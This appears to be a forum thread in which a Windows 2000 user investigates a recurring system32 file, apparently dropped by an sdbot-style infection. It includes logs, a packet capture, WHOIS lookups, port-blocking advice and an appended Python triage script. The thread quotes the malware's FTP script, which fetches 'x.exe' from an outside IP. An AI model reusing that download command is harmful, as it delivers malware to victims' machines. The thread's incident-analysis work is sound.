I open the file i in system32 with notepad and it has:
open 218.63.173.251 6497
user 1 1
get x.exe
quit
This is on a fresh installation of Windows 2000.
I have the Internet Explorer security setting as high as it will go.
I am on the internet as a restricted user.
Even if I am not touching the PC, after a while it pops up again.
I just want to block unwanted files being deposited on my computer.
.........................
%windir%\system32\ftp.bat
.........................
@echo off
echo %date:~4,10% %time:~0,8% %0 %1 %2 %3 %4 %5 %6 %7 %8 %9 >> c:\foo.log
............
c:\foo.log
............
10/15/2006 1:09:29 ftp -n -s:i
10/15/2006 1:16:32 ftp -n -s:i
10/15/2006 1:30:58 ftp -n -s:i
10/15/2006 11:29:53 ftp -n -s:o
10/15/2006 11:32:55 ftp -n -s:o
10/15/2006 11:33:17 ftp -n -s:i
10/15/2006 11:33:42 ftp -n -s:o
10/15/2006 11:35:07 ftp -n -s:i
10/15/2006 17:11:16 ftp -n -s:i
10/15/2006 17:23:37 ftp -n -s:i
10/15/2006 21:48:45 ftp -n -s:i
...........
windump has
...........
21:48:28.387824 IP 221.208.208.90.32846 > walterh2.1027: UDP, length 459
21:48:28.387824 IP walterh2 > 221.208.208.90: ICMP walterh2 udp port 1027 unreachable, length 36
%windir%\system32\i appeared at 21:48:45
WHOIS Record For
221.208.208.90
Record Type: IP Address
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
WHOIS Record For
218.63.173.251
Record Type: IP Address
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
Blocking, you can't do it from Windows alone. You need a separate program that monitors and blocks internet traffic by blocking specific ports.
Control Panel -> Administrative Tools -> Local Security Policy -> IP Security Policies on Local Machine
.. Manage IP Filter Lists
.. Create IP Security Policy
.... Block inbound UDP 1025,1026,1027 and TCP 1025,445,135
Have not seen that sdbot for a while...
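
The ftp.bat wrapper log and the script file `i` posted earlier in the thread can be triaged automatically. The following is an added example, not part of any post in the thread: it flags unattended `ftp -n -s:<file>` runs in a log of that shape and pulls the remote endpoint and downloaded file names out of the script. The sample data is constructed from the thread's format, and the function names and the last log line are assumptions made for illustration.

```python
import re
from datetime import datetime

# Constructed samples in the shape shown in the thread (wrapper log and script file "i").
SAMPLE_LOG = """\
10/15/2006 1:09:29 ftp -n -s:i
10/15/2006 11:29:53 ftp -n -s:o
10/15/2006 21:48:45 ftp -n -s:i
10/16/2006 9:02:11 ftp ftp.example.org
"""
SAMPLE_SCRIPT = """\
open 218.63.173.251 6497
user 1 1
get x.exe
quit
"""

# date, time, invoked name (%0), remaining arguments (%1..%9)
LOG_RE = re.compile(r"^(\d{1,2}/\d{1,2}/\d{4}) +(\d{1,2}:\d{2}:\d{2}) +(\S+)(.*)$")

def scripted_ftp_runs(log_text):
    """Return (timestamp, script_name) for each logged 'ftp -n -s:<file>' run."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        args = [a.lower() for a in m.group(4).split()]
        script = next((a[3:] for a in args if a.startswith("-s:")), None)
        # -n disables auto-login and -s: reads commands from a file,
        # so together they indicate a non-interactive transfer.
        if script and "-n" in args:
            ts = datetime.strptime(m.group(1) + " " + m.group(2), "%m/%d/%Y %H:%M:%S")
            hits.append((ts, script))
    return hits

def summarize_script(script_text):
    """Extract the remote host, port and fetched files from an ftp -s: script."""
    info = {"host": None, "port": 21, "downloads": []}
    for line in script_text.splitlines():
        parts = line.split()
        if not parts:
            continue
        cmd = parts[0].lower()
        if cmd == "open" and len(parts) >= 2:
            info["host"] = parts[1]
            if len(parts) >= 3 and parts[2].isdigit():
                info["port"] = int(parts[2])
        elif cmd in ("get", "recv", "mget") and len(parts) >= 2:
            info["downloads"].append(parts[1])
    return info
```

The timestamps returned by `scripted_ftp_runs` can then be lined up against the packet capture, as the poster did by hand with the 21:48 entries.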